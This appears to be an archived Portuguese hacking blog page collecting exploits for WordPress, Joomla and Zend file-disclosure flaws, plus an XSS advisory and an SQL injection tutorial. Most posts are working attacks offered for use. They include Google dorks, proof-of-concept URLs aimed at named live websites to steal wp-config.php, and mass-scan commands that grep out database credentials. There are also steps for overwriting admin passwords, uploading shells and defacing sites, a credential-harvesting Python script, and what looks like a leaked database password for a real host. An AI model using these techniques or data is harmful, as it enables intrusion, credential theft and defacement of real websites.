Mostrando postagens com marcador Vulnerability. Mostrar todas as postagens
Mostrando postagens com marcador Vulnerability. Mostrar todas as postagens

quinta-feira, 26 de fevereiro de 2015

Wordpress Revolution Slider Local File Disclosure

Wordpress Revolution Slider Local File Disclosure
Nesse tutorial mostro como vocês pode obter dados do mysql dos servidores vulneravel, ("E-Commerce") usando a google inurlbr para fazer as busca e deixando tudo organizado no bloco de notas, tambem fazendo uma verificação na posta do servidor, a porta 3306 a qual usaremos para nos conectar nor servidor, e assim tendo acesso a tabela de usuarios do wordpress, podendo fazer update da senha e colocando a nossa e assim logamos no painel.
[+] Titulo: Wordpress slider reolusion local file download
[+] Data: 25-01-2015
[+] Author: JOK3R
[+] Site Vendedor: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Testado em: windows 7 / firefox , kali linux / firefox
[+] Arquivos Vulneravel: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/
POC:
http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Demo:
http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Creditos:
Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*
And All iranian Hacker's And Exploiter's <3
[+] iran-cyber.in 
Sobre SCANNER - INURLBR
GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
SCRIPT NAME: INURLBR
AUTOR: Cleiton Pinheiro
Nick: Googleinurl
Blog: http://blog.inurl.com.br
twitter: /@googleinurl
facebook: /InurlBrasil Download: Script
Outras  Informações
Na Busca vamos usar a "Google InurlBR" que faz toda a busca de forma rapida e facil. Junto como o comando do NMAP, para verificar a porta 3306 se está aberta. (OBS, "Não significa a porta esteja aberta que você consiga entrar no MYSQL. Algums Servidores, devem está configurado para não acessa remotamente o servidor do MYSQL")

Busca Avançada com InurlBr + Nmap
Mude aqui para outros dominios em = site:br, site:com, site:uk... etc
Crie um pasta na sua area de trabalho com o nome  " output " ou remova o caminho

Comando InurlBR
root@kali:~# php inurlbr.php --dork '"Index of" /wp-content/plugins/revolution-slider site:br' -q 1,6 -s ~/Desktop/output/wp-out.txt --exploit-get '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' --comand-vul 'nmap -Pn -p 3306 _TARGET_' --comand-all 'echo "_TARGET__EXPLOIT_">> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
Video:

Wordpress_Revolution_Slider_Local_File_Disclosure - ECommerce from Mathew Thomas on Vimeo.

https://youtu.be/5rvOuPGLwuk?t=4m48s
Read More

sábado, 21 de fevereiro de 2015

Wordpress Redsteel Theme File Disclosure

Wordpress Redsteel Theme File Disclosure

[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/RedSteel
[*] Date : Date: 2015-01-25
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/
[*] Tested on: Windows 7
[*] Discovered By : ACC3SS

Location:
[localhost]/wp-content/themes/RedSteel/download.php?file=filename.php

Vulnerable code file : download.php

<?php
$file = @$_GET['file'];
$parts = explode('/',$file);
$fileName = $parts[sizeof($parts)-1];
if ((isset($file))&&(file_exists($file))) {
  header("Content-type: application/force-download");
  header('Content-Disposition: inline; filename="' . $fileName . '"');
  header("Content-Transfer-Encoding: Binary");
  header("Content-length: ".filesize($file));
  header('Content-Type: application/octet-stream');
  header('Content-Disposition: attachment; filename="' . $fileName . '"');
  readfile($file);
}
?>

Proof:
http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php


lllllllllllllllllllldjjjjjjjjjjjjjjjjj







Read More

quinta-feira, 22 de janeiro de 2015

SQL Injection - Injeção de SQL- TUTORIAL Completo Básico

Introdução
A Injeção de SQL, mais conhecida através do termo americano SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação. 
Fonte: Wikepédia


Requesitos
Um Servidor Linux ou "Windows com o Xampp"
O Linux com apache2 instalado e o MySQL, também com o phpMyadmin
O Windows com o Xampp, Xampp já vem com tudo comfigurado
Um editor de texto, como exemplo bloco de nota && notepad++ && sublime
ou o netbeans, eu prefiro o netbeans.

Criando uma Pagina
Primeiro, navegue ate a pasta /var/www/, abra o terminal e digite:
$ cd /var/www 
Agora crie uma pasta, comando:
$ /var/www# mkdir pagetest
Listar diretorio
$ /var/www# ls -lAh
drwxr-xr-x  2 root root 4.0K Jan 19 23:26 pagetest
Em seguida alterei as permissões, comando:
$ /var/www# chmod 777 pagetest -R
Liste mais uma vez o diretorio isso não é obrigatorio
$ /var/www# ls -lAh
drwxrwxrwx  2 root root 4.0K Jan 19 23:26 pagetest
Agora Vamos criar um arquivo de configuração, para fazer a conexão como o servido mysql, para acender um banco de dados. No terminal digite: para entra dentro da pasta onde vamos trabalhar
$ /var/www# cd pagetest/
Agora digite:
$ /var/www/pagetest# nano config.php
No editor copie ou escreva essas linhas e salve o arquivo;
<?php
# " localhost " endereço do banco esse ira ficar assim mesmo pois vc vai esta localmente
# " root " usuario do banco
# " dmyka1728 " senha do banco
# " dbtest " nome do banco
# Subistitua isso pelo seus dados
mysql_connect("localhost","root","dmyka1728");
mysql_select_db("dbtest");
Agora vamos criar a nossa index principal, lembrando, não irei estiliza com CSS , comando digite:
$ /var/www/pagetest# nano index.php
No editor copie ou escreva essas linhas e salve o arquivo;
<?php
include "config.php"; #Incluir o nosso arquivo de configuração com o banco
?>
<html>
<head>
<title>Index-Test</title>
</head>
<body>
Visualizar Dados <a href="index.php?id=1">Ver</a></br></br>
 <?php
  $id = $_GET['id'];
  $sqlquery = "SELECT * FROM infousers WHERE id='$id'";
  $execute = mysql_query($sqlquery);
   while ($row = mysql_fetch_array($execute)){
    echo "
    <b>Name:</b> $row[1]</br>
    <b>Fone:</b> $row[2]</br>
    <b>Data:</b> $row[3]</br>
    <b>CPF:</b>  $row[4]</br></br>";
   }
 ?>
</body>
</html>
Logando no phpMyAdmin
Agora  iremos logar no phpmyadmin pra poder criar o banco e tabelas e inserir os dados para nossos testes.
Abra o seu navegador de preferencial, navegue até o enderço http://localhost/phpmyadmin - logger com seus dados - em user do mysql e pass do mysql, como mostra a imagem abaixo:

video:
Read More

WordPress Ajax Store Locator Arbitrary File Download

  • # Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download
  • # Exploit Author : Claudio Viviani
  • # Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
  • # Software Link : Premium
  • # Dork Google: inurl:ajax-store-locator
  • #              index of ajax-store-locator    
  • # Date : 2014-12-06
  • # Tested on : Windows 7 / Mozilla Firefox
  • #             Linux / Mozilla Firefox
  • # PoC Exploit: http://TARGET/wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
  • or
  • http://TARGET/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
  • "download_file" variable is not sanitized.
  • ################
  • Discovered By : Claudio Viviani
  •                 http://www.homelab.it
  •                 info@homelab.it
  •                 homelabit@protonmail.ch
  •                 https://www.facebook.com/homelabit
  •                 https://twitter.com/homelabit
  •                 https://plus.google.com/+HomelabIt1/
  •                 https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  • ################
More dorks:
  • index of /wp-content/plugins/ajax-store-locator-wordpress/ site:com/uk/org/br/..etc..
Example of config.php
  • define('DB_NAME', 'name_database');
  • /** MySQL database username */
  • define('DB_USER', 'user_database');
  • /** MySQL database password */
  • define('DB_PASSWORD', 'pass_database');
  • /** MySQL hostname */
  • define('DB_HOST', 'adress_database');
Caso em DB_HOST esteje setado como localhost, você pode verificar com os seguintes endereços:
mysql.nome-do-site.com
ou
nome-do-site.com:3306 "caso esse esteje funcionando você tem q usar com um programa de sql
  • ex: HeidiSQL para windows ou no proprio console do linux,
  • ex: mysql --host endereço-do-site.com --user usuario --password='senha'
ou
nome-do-site.com/phpmyadmin
Com essa vulnerabilidade você execulta atravez do navegador, mais isso se torna chato e cansativo, então vamos usar um otimo script pra fazer toda a busca e deixar organizado pra gente
Usando com o srcipt INURLBR para automatização do processo de buscas:
Commando:
  • inurlbr.php --dork 'inurl:"ajax-store-locator" site:com' -q 1,6 -s ~/Desktop/output/wp-out.txt --exploit-get '/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=../../../wp-config.php' -t 3 --exploit-comand '/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=../../../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

WordPress_Ajax_Store_Locator_Arbitrary_file_download from Mathew Thomas on Vimeo.


Read More

WordPress File Disclosure Vulnerability - Plugin Revslider + Upload Shell + Defacement

Bom pessoal,
Hoje vou falar de uns vulnerabilidades no wordpress  é a wordpress Multiple Themes Arbitrary File Download  com elas conseguimos algumas credencias
como: host do mysql, user do mysql,pass do mysql
Essas vulnerabilitade o Risco é bem alto para o servidor,  com podemos trocar a senha do administrator e assim entra no painel  do worpress, e urpando algum $code malicioso para o servidor,  assim tendo nosso proprio panel, ou backdoor, ou mesmo MakeDefacement.
Eu nao conhecia essa vul, quem me falou foi skeleton a uns dois meses atras,  mais a muitos e muitos servidores nao corrigidos.
Exploit-db
# WordPress Ultimate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
# Tested on: Windows 7 and Gnu/Linux
# Exploit(Revslide):
  1. Google Dork: "Index of"  +/wp-content/themes/ultimate/
  2.  "Patch vul : /wp-content/themes/ultimate/"
  3. Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
  4.  "Patch vul : /wp-content/themes/IncredibleWP/"
  5. Google Dork: "Index of" +/wp-content/themes/ultimatum
  6.  "Patch vul : /wp-content/themes/ultimatum/"
  7. Google Dork: "Index of" +/wp-content/themes/medicate/
  8.  "Patch vul : /wp-content/themes/medicate/"
  9. Google Dork: "Index of" +/wp-content/themes/Centum/
  10.  "Patch vul : /wp-content/themes/Centum/"
  11. Google Dork: "Index of" +/wp-content/themes/Avada/
  12.  "Patch vul : /wp-content/themes/Avada/"
  13. Google Dork: "Index of" +/wp-content/themes/striking_r/
  14.  "Patch vul : /wp-content/themes/striking_r/"
  15. Google Dork: "Index of" +/wp-content/themes/beach_apollo/
  16.  "Patch vul : /wp-content/themes/beach_apollo/"
  17. Google Dork: "Index of" +/wp-content/themes/cuckootap/
  18.  "Patch vul : /wp-content/themes/cuckootap/"
For this exploit ::
dork :  revslider.php "index of" site:**
           inurl:/revslider/rs-plugin/videojs/video-js.swf
           inurl:/revslider/rs-plugin/videojs/


+  Dicas de Buscas
  • inurl:wp-content/plugins/revslider site:
  • inurl:framework/plugins/revslider/ site:
Poc:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Exemple:
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
QUANDO ABRIR O ARQUIVO VOCÊ VERA ALGO IGUAL ISSO:
EXEMPLO
O que pode ser feito,trocar senha de admin, logar no painel Wordpress:
Ativar ou instalar alguns plugins para urpar nossa shell e ver uns dicas de diretoria para plugins e themas
USE O NMAP PARA VERIFICAR A PORTA 3306
Logar no servidor mysql
COMMANDOS:
mysql --host endereço_do_mysql.com --user usuario_aqui --password='senha_aqui'
Vizualizar o banco de dados:
mysql> SHOW databases;
Usar o banco worddeep:
mysql> USE worddeep;
Vizualiza as tabelas:
mysql> SHOW tables;
Seleciona a tabela usuarios:
mysql> SELECT * FROM wp_users;
Atualiza uma senha um usuario:
mysql> UPDATE `nome_banco`.`nome_tabela` SET `nome_coluna`='$P$BeZiobCs7WNKp1mkSz2nujcQb6tbes0' WHERE `nome_tabela`.`ID`=1;
Diretorios
DIR /wp-content/themes/twentyfourteen/404.php
DIR /wp-content/plugins/akismet/index.php
DIR /wp-content/plugins/hello.php     
Arquivos usado no video download
deUpload.php
deShell.php
deDeface.php
Video Demo
Read More

Joomla HD FLV Player + Upload + Shell + Deface


Exploit Title :  Joomla HD FLV Player <= 2.1.0.1 Arbitrary File Download Vulnerability
Exploit Author : Claudio Viviani
Vendor Homepage : http://www.hdflvplayer.net/
Software Link : http://www.hdflvplayer.net/hd-flv-player-download.php

Dork google 1:  inurl:/component/hdflvplayer/
Dork google 2:  inurl:com_hdflvplayer    

Date : 2014-11-11
Tested on : BackBox 3.x/4.x

Bom pessoal a falha afeta o componente hdflyvplayer, onde podemos adiquiro o arquivo de configuração do banco de dados com o servidor, assim podendo ter acesso aos usuario do site e subistituindo as senhas.



Video Demo;

Joomla HD FLV Player + Upload + Shell + Deface from Mathew Thomas on Vimeo.

Read More

quarta-feira, 21 de janeiro de 2015

Zend-Framework Full Info Disclosure

# Exploit Title : Zend-Framework Full Info Disclosure
# Google Dork : inurl:/application/configs/application.ini
# Date : 26/11/2013
# Exploit Author : Ariel Orellana
# Vendor Homepage : http://framework.zend.com/
# Category : Web applications
# Tested on : GNU/Linux

#[Comment]Greetz : Daniel Godoy

#[PoC] :
#The username and password of the database may be obtained trough the "application.ini" file

#Vulnerable page : http://target.com/application/configs/application.ini
#Vulnerable page : http://target.com/application/configs/application.ini
#Vulnerable page : http://target.com/application/configs/db.ini
#Vulnerable page : http://target.com/application/configs/config.ini



Dork -> inurl:/application/configs/application.ini

Dork -> site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

Dork -> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

Dork -> inurl:/configs/ "params.password" db.ini ext:ini

Dork -> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password

#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/application/configs/application.ini"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

http://www.exploit-db.com/exploits/29921/



Read More

Stored Server XSS in ZyXEL SBG-3300 Security Gateway

########################################
#Titulo Vulnerabilidade: Stored Server XSS in ZyXEL SBG-3300 Security Gateway
#Data: 02/10/2014
#CVE-ID: CVE-2014-7277
#Produto: ZyXEL SBG3300-N series
#Vendedor: www.zyxel.com
#Firmware afetado: Latest version at the time of disclosure V1.00(AADY.4)C0 and below (tested)
#Patch: Unpatched
#Autor: Mirko Casadei
########################################

#Disclosure Timeline:
13/08/2014  Vendor Contact with Acknowledgment
13/09/2014  No response from Vendor after first contact
02/10/2014  Full Disclosure

#Detalhes técnicos:
A interface web do Gateway Security é afetado por uma vulnerabilidade XSS Server armazenadas na página de login principal.
Abusando do login 'mensagem de boas-vindas' a partir de, um atacante pode injetar o XSS em código HTML.
Exemplo de uma codigo:
..
<span class="title_index">Welcome</span><br>
<li id="loginMessage"><img src=x onerror=alert('XSS') /></li>
..

#Remediação
A forma vulnerável que deve limpar a entrada.
########################################

Read More

WordPress Ultimate Theme Arbitrary File Download

  1. # WordPress Ultimate Theme Arbitrary File Download
  2. # Risco: Alto
  3. # Número CWE: CWE-200
  4. # Autor: Hugo Santiago
  5. # Contato: hugo.s@linuxmail.org
  6. # Data: 31/08/2014
  7. # Vendedor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
  8. # Testado em: Windows 7 and Gnu/Linux
  9. # Google Dork: "Index of"  +/wp-content/themes/ultimate/
  10. # Patch vul : /wp-content/themes/ultimate/
  11. # Exploit(Revslide):
  • http://vitima/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC :
  • http://iai.pt/wp/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • http://www.wanderlogic.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Exemplo config.php
  • define('DB_USER', 'admincom1');
  • define('DB_PASSWORD', '!J5XnVsc%');
  • define('DB_HOST', 'mysql.admincom.com.br');
Have fun

Imagem Ilustrativa

Read More